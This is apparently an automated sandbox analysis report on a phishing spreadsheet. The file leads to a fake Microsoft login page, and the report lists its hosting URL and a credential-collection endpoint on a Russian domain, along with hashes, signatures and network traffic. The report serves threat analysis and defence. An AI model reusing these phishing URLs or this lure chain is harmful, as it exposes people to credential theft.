Loading ...

Play interactive tourEdit tour

Analysis Report Fennec Pharma.xlsx

Overview

General Information

Sample Name:Fennec Pharma.xlsx
Analysis ID:321368
MD5:a2315b66552273d966bdc8570a6a7208
SHA1:ad82640b54ce17f43e9df68ebfa700de48df5ef0
SHA256:8c3a18ce48dbab7971870da260421c03483e279795768bfdeb0ee7dd6079ec2b

Most interesting Screenshot:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish_10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo template match)
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2376 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • iexplore.exe (PID: 2552 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dfce06801e1a85d6d06f1fdd4475dacd[1].htmJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlSlashNext: Label: Fake Login Page type: Phishing & Social Engineering

    Phishing:

    barindex
    Yara detected HtmlPhish_10Show sources
    Source: Yara matchFile source: 305090.3.links.csv, type: HTML
    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dfce06801e1a85d6d06f1fdd4475dacd[1].htm, type: DROPPED
    Phishing site detected (based on image similarity)Show sources
    Source: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/rC56cpX1uS2qJKOxJ-5Sb8u-.svgMatcher: Found strong image similarity, brand: MicrosoftJump to dropped file
    Phishing site detected (based on logo template match)Show sources
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlMatcher: Template: microsoft matched
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: Number of links: 0
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: Number of links: 0
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: Title: Log-In does not match URL
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: Title: Log-In does not match URL
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: No <meta name="author".. found
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: No <meta name="author".. found
    Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="author".. found
    Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="author".. found
    Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="author".. found
    Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="author".. found
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: No <meta name="copyright".. found
    Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlHTTP Parser: No <meta name="copyright".. found
    Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="copyright".. found
    Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="copyright".. found
    Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="copyright".. found
    Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPIHTTP Parser: No <meta name="copyright".. found
    Source: Joe Sandbox ViewIP Address: 74.125.140.154 74.125.140.154
    Source: Joe Sandbox ViewIP Address: 104.16.19.94 104.16.19.94
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7187B60E.pngJump to behavior
    Source: document_view.min[1].js.3.drString found in binary or memory: re glad you like WorkFlowy. Please share it with your friends!"),!c.d()&&o.createElement(o.Fragment,null,o.createElement("div",{className:Object(l.e)({marginBottom:"24px",lineHeight:"20px",fontSize:"13px"})},o.createElement("strong",null,"When a friend signs up through your Facebook post, we'll give you"," ",s===d?"both "+s+" more monthly items.":s+" more monthly items."+(d?" They'll get "+d+" more items too.":""))," ","You currently have ",i," WorkFlowy items per month.")),o.createElement(a.b,{buttonStyle:a.a.Primary,onClick:function(){var e=f+"&utm_campaign=friend_recommendation_prompt_10_days&utm_medium=facebook&utm_source=wf";window.open("https://www.facebook.com/sharer/sharer.php?u="+e,"Share WorkFlowy","height=640,width=558,left=50,top=50"),_gaq.push(["_trackPageview","/virtual/friend_recommendation_prompt/10_days/facebook_share_button_clicked"])}},"Share WorkFlowy on Facebook")))}},t}return d(t,e),t.prototype.componentWillUnount=function(){_gaq.push(["_trackPageview","/virtual/friend_recommendation_prompt/10_days/rating_dialog_closed/"])},t.prototype.render=function(){return o.createElement(o.Fragment,null,o.createElement(u.b,null,"What do you think of WorkFlowy?"),o.createElement("div",{className:Object(l.e)({marginTop:"24px",marginBottom:"24px"})},"Please click a star to rate WorkFlowy."),o.createElement(p,{onChange:this.onRatingChange}),o.createElement("div",{className:Object(l.e)({marginTop:"24px",marginBottom:"12px",fontSize:"13px",lineHeight:"20px"})},"You equals www.facebook.com (Facebook)
    Source: unknownDNS traffic detected: queries for: workflowy.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.3.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: document_view.min[1].js.3.drString found in binary or memory: http://getfirefox.com
    Source: document_view.min[1].js.3.drString found in binary or memory: http://google.com/chrome
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: http://jquery.org/license
    Source: popper.min[1].js.3.drString found in binary or memory: http://opensource.org/licenses/MIT).
    Source: ga[1].js.3.drString found in binary or memory: http://www.google-analytics.com
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://code.jquery.com/jquery-3.3.1.js
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
    Source: free-fa-regular-400[1].eot.3.dr, free.min[1].css.3.drString found in binary or memory: https://fontawesome.com
    Source: free.min[1].css.3.drString found in binary or memory: https://fontawesome.com/license/free
    Source: free-fa-regular-400[1].eot.3.dr, free-fa-solid-900[1].eot.3.drString found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
    Source: css[1].css.3.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0bbwiXo.woff)
    Source: bootstrap.min[1].css.3.dr, bootstrap.min[1].js.3.drString found in binary or memory: https://getbootstrap.com)
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
    Source: bootstrap.min[1].css.3.dr, bootstrap.min[1].js.3.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
    Source: bootstrap.min[1].js.3.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
    Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://jamif-cdn3d.us
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://jquery.com/
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://jquery.org/license
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://kit.fontawesome.com/585b051251.js
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-48
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-54
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-57
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-59
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-61
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-64
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://promisesaplus.com/#point-75
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/Z
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/r
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://sizzlejs.com/
    Source: ga[1].js.3.drString found in binary or memory: https://ssl.google-analytics.com
    Source: Tdcv9KOl0AuohEPI[1].htm0.3.drString found in binary or memory: https://ssl.google-analytics.com/ga.js
    Source: ga[1].js.3.drString found in binary or memory: https://ssl.google-analytics.com/j/__utm.gif
    Source: ga[1].js.3.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect?
    Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.drString found in binary or memory: https://ukrainianpolicy.ru/Dee23ope11nov/next.php
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
    Source: jquery-3.3.1[1].js.3.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
    Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://workflowy-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlRoot
    Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://workflowy.com/
    Source: signup[1].htm0.3.dr, login[1].htm0.3.drString found in binary or memory: https://workflowy.com/accounts/password_reset/
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI&Log
    Source: imagestore.dat.3.drString found in binary or memory: https://workflowy.com/media/i/favicon.ico
    Source: imagestore.dat.3.drString found in binary or memory: https://workflowy.com/media/i/favicon.ico~
    Source: document_view.min[1].js.3.drString found in binary or memory: https://workflowy.com/referrals/
    Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://workflowy.com/s/this-doRoot
    Source: ~DF3768AA9CB305EF1C.TMP.2.dr, {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI#/7686a5f8c6e6
    Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.drString found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPIRoot
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPInThis
    Source: ~DF3768AA9CB305EF1C.TMP.2.drString found in binary or memory: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI
    Source: ga[1].js.3.drString found in binary or memory: https://www.google.%/ads/ga-audiences?
    Source: ga[1].js.3.drString found in binary or memory: https://www.google.com/analytics/web/inpage/pub/inpage.js?
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
    Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
    Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
    Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
    Source: classification engineClassification label: mal64.phis.winXLSX@4/75@12/5
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Fennec Pharma.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD123.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Fennec Pharma.xlsxInitial sample: OLE zip file path = xl/media/image1.png
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.